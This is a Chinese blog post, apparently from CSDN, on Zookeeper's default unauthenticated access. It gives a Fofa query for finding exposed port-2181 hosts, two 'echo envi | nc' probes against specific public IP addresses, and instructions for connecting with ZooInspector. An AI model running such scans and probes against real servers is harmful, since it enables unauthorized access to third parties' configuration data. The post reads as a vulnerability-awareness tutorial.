首页 > 其他分享 >Zookeeper未授权访问漏洞

Zookeeper未授权访问漏洞

时间:2024-08-04 13:53:22浏览次数:11  
标签:nc 步骤 Zookeeper 漏洞 2181 攻击者 授权

Zookeeper未授权访问漏洞

Zookeeper是分布式协同管理工具,常用来管理系统配置信息,提供分布式协同服务。Zookeeper的默认开放端口是 2181。Zookeeper安装部署之后默认情况下不需要任何身份验证,造成攻击者可以远程利用Zookeeper,通过服务器收集敏感信息或者在Zookeeper集群内进行破坏(比如:ki命令)。攻击者能够执行所有只允许由管理员运行的命令。

漏洞利用

步骤一:使用以下Fofa语法搜索资产信息

port="2181"

步骤二:在Kali中使用以下命令进行未授权访问漏洞测试.

echo envi | nc 114.242.175.75 2181
echo envi | nc 223.5.253.242 2181

在这里插入图片描述
步骤三:可使用Zookeeper可视化管理工具进行连接

#工具下载
https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip

下载在buld–>双击zookeeper-dev-ZooInspector.jar
在这里插入图片描述

标签:nc,步骤,Zookeeper,漏洞,2181,攻击者,授权
From: https://blog.csdn.net/weixin_53736204/article/details/140903281

相关文章

  • 强大的X站 七色坊+免授权+带打赏+带三级分销+已对接支付
    强大的X站七色坊+免授权+带打赏+带三级分销+已对接支付强大的X站:七色坊+免授权+带打赏+带**分销+已对接支付在数字时代的浪潮中,互联网平台如雨后春笋般涌现,其中,X站以其独特的商业模式和强大的功能集合,成为了业界的一颗璀璨明星。本文将深入探讨X站如何整合七色坊内容、免授......
  • Nexpose v6.6.263 for Linux & Windows - 漏洞扫描
    Nexposev6.6.263forLinux&Windows-漏洞扫描Rapid7VulnerabilityManagement,releaseJul31,2024请访问原文链接:https://sysin.org/blog/nexpose-6/,查看最新版。原创作品,转载请保留出处。您的本地漏洞扫描程序搜集通过实时覆盖整个网络,随时了解您的风险。......
  • 致远互联FE协作办公平台 apprvaddNew.jsp SQL注入漏洞复现
    0x01产品简介致远互联FE协作办公平台是一款为企业提供全方位协同办公解决方案的产品。它集成了多个功能模块,旨在帮助企业实现高效的团队协作、信息共享和文档管理。0x02漏洞概述致远互联FE协作办公平台apprvaddNew.jsp接口处存在SQL注入漏洞,未经身份验证的攻击者可以通......
  • 赛蓝企业管理系统 AuthToken/Index 身份认证绕过漏洞复现
    0x01产品简介赛蓝企业管理系统是一款为企业提供全面管理解决方案的软件系统,它能够帮助企业实现精细化管理,提高效率,降低成本。系统集成了多种管理功能,包括但不限于项目管理、财务管理、采购管理、销售管理以及报表分析等,旨在为企业提供一站式的管理解决方案。该系统以先进的管......
  • 漏洞扫描
    联通国际公司漏洞扫描服务产品介绍随着网络攻击事件频发,企业对于网络安全的需求日益增长。联通国际公司推出的漏洞扫描服务,旨在帮助企业及时发现并解决其内部IT资产中存在的潜在安全漏洞,从而有效降低遭受网络攻击的风险。该服务提供了高性价比的全面解决方案,支持现场或远程扫描......
  • 什么是漏洞分析?
    关注公众号网络研究观获取更多内容。在这个数字化应用不仅是一种趋势而且是一种必需品的时代,网络安全形势变得越来越复杂和严峻。随着我们越来越依赖技术,恶意行为者正在寻求更多方法来利用计算机系统、网络和软件中的漏洞。这使组织、政府和个人不断面临网络攻击的风险,这......
  • 漏洞评估工具的类型
    关注公众号网络研究观获取更多内容。漏洞评估工具是信息安全管理中的关键组成部分。它们的作用是在攻击者利用之前查明潜在的安全漏洞。可以采用各种方法和解决方案来进行漏洞评估。选择合适的评估策略对于降低组织的风险至关重要。漏洞评估的不同方法在评估漏洞评估方......
  • Zookeeper之HA
    HA步骤配置之前先拍摄快照(重要)快照名称设置为Zookeeper配置免密登录#在node1节点执行ssh-keygen-trsa#三次回车之后ssh-copy-idnode1ssh-copy-idnode2ssh-copy-idmaster关闭所有Hadoop#关闭Hadoopstop-all.sh在core-site.xml中添加如下配置:--注......
  • Navicat Premium(数据库管理) v17 授权版
    Navicat17全新升级,软件增强了数据库管理和数据分析的功能体验。其中包括模型设计与同步、数据字典、数据分析(dataprofiling)、用户体验、查询优化、BI功能集成MongoDB/Snowflake、专注模式、Redis哨兵模式与平台扩展LinuxARM等。此次升级让用户在数据库的创建、管理、......
  • 大数据场景下的Zookeeper集群的搭建
    本篇文件将介绍如何搭建zookeeper集群,并集合大数据相关组件介绍zookeeper的功能一、Zookeeper是做什么的,我们搭建它有什么用处Zookeeper是一个分布式的服务管理框架,它负责存储和管理大家都关心的数据,基于观察者涉及模式,Zookeeper接受观察者的注册,一旦这些数据的状态发生了变......